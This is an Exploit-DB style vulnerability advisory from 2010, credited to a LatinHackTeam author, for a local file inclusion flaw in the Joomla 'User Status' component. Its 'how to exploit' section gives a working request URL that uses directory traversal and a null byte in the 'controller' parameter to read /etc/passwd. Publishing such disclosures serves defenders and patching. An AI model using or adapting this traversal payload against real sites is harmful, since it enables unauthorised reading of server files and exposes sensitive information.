Joomla! Component User Status - Local File Inclusion

EDB-ID:

11998




Platform:

PHP

Date:

2010-04-01


---------------------------------------------------------------------------------
Joomla Component User Status Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: User Status
version		: 1.21.16 
Developer	: Mo Kelly
License		: GPL            type  : Commercial
Price		: 10.00 USD
Date Added	: 27 March 2010
Download	: http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html



Description     :

The component back end allows the entry of locations. Also assigning users to a location is done in the back end.
Users that are not assigned a location do not show up in the User Status Screen.

After creating locations and assigning users you may view their status from the front end.
Create a menu selection with user User Status component.

There is a separate module to allow users to update their status.

Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status.

A User's status must be updated to change, it will not expire with the user session.


--------------
file error	: components/com_userstatus/userstatus.php

how to exploit

http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++